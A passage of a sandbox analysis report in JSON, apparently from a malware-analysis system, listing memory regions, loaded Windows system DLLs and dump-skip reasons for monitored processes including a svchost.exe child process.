"filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2323", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1969553408, "timestamp": "00:03:36.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130255872, "type": "region", "version": 1 }, "end_va": 2130268159, "entry_point": 0, "filename": null, "id": "region_2324", "name": "private_0x000000007ef92000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130255872, "timestamp": "00:03:36.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 0, "filename": null, "id": "region_2325", "name": "pagefile_0x00000000002b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:03:36.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 368640, "start_va": 1952251904, "type": "region", "version": 1 }, "end_va": 1952620543, "entry_point": 1952251904, "filename": "\\Windows\\SysWOW64\\netprofm.dll", "id": "region_2326", "name": "netprofm.dll", "norm_filename": "c:\\windows\\syswow64\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 1952251904, "timestamp": "00:03:36.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1952186368, "type": "region", "version": 1 }, "end_va": 1952243711, "entry_point": 1952186368, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2327", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1952186368, "timestamp": "00:03:36.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 47710208, "type": "region", "version": 1 }, "end_va": 47972351, "entry_point": 0, "filename": null, "id": "region_2328", "name": "private_0x0000000002d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 47710208, "timestamp": "00:03:36.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 48562176, "type": "region", "version": 1 }, "end_va": 48824319, "entry_point": 0, "filename": null, "id": "region_2329", "name": "private_0x0000000002e50000", "norm_filename": null, "region_type": "private_memory", "start_va": 48562176, "timestamp": "00:03:36.455", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", "filename": "c:\\windows\\syswow64\\svchost.exe", "id": "proc_13", "image_name": "svchost.exe", "monitor_reason": "child_process", "monitored_id": 13, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2194", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:03:35.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2195", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:03:35.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2196", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:03:35.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2197", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:03:35.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2198", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:03:35.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 573439, "entry_point": 0, "filename": null, "id": "region_2199", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:03:35.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_2200", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:03:35.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_2201", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:03:35.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 16646144, "type": "region", "version": 1 }, "end_va": 16678911, "entry_point": 16646144, "filename": "\\Windows\\SysWOW64\\svchost.exe", "id": "region_2202", "name": "svchost.exe", "norm_filename": "c:\\windows\\syswow64\\svchost.exe", "region_type": "memory_mapped_file", "start_va": 16646144, "timestamp": "00:03:35.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2203", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:03:35.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2204", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:03:35.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2205", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:03:35.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2206", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:03:35.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2207", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:03:35.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2208", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:03:35.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2209", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:03:35.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2210", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:03:35.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2211", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:03:35.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_2212", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:03:35.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_2213", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:03:35.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_2214", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:03:35.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953464319, "entry_point": 1953431552, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2215", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:03:35.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953497088, "type": "region", "version": 1 }, "end_va": 1953873919, "entry_point": 1953497088, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2216", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953497088, "timestamp": "00:03:35.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953890304, "type": "region", "version": 1 }, "end_va": 1954148351, "entry_point": 1953890304, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2217", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953890304, "timestamp": "00:03:35.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2218", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:03:35.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2221", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:03:35.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1011711, "entry_point": 589824, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2222", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 589824, "timestamp": "00:03:35.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 6225919, "entry_point": 0, "filename": null, "id": "region_2223", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:03:35.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7471104, "type": "region", "version": 1 }, "end_va": 7536639, "entry_point": 0, "filename": null, "id": "region_2224", "name": "private_0x0000000000720000", "norm_filename": null, "region_type": "private_memory", "start_va": 7471104, "timestamp": "00:03:35.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960574976, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2225", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:03:35.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960640512, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2226", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:03:35.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961426944, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2227", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:03:35.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965359104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2228", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:03:35.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965686784, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2229", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:03:35.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973354496, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2230", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:03:35.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993867264, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2231", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:03:35.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_2232", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:03:35.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_2233", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:03:35.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2234", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:03:35.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2235", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:03:35.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970864128, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2236", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:03:35.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964179456, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2237", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:03:35.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970798592, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2238", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:03:35.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1968898048, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2239", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:03:35.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2240", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:03:35.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 122880, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 253951, "entry_point": 131072, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2241", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 131072, "timestamp": "00:03:35.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 9142271, "entry_point": 0, "filename": null, "id": "region_2242", "name": "pagefile_0x0000000000730000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7536640, "timestamp": "00:03:35.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961033728, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2244", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:03:35.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974468608, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2245", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:03:35.399", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9175040, "type": "region", "version": 1 }, "end_va": 10751999, "entry_point": 0, "filename": null, "id": "region_2246", "name": "pagefile_0x00000000008c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9175040, "timestamp": "00:03:35.401", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 16711680, "type": "region", "version": 1 }, "end_va": 37683199, "entry_point": 0, "filename": null, "id": "region_2247", "name": "pagefile_0x0000000000ff0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 16711680, "timestamp": "00:03:35.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_2248", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:03:35.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2249", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:03:35.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_2250", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:03:35.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, 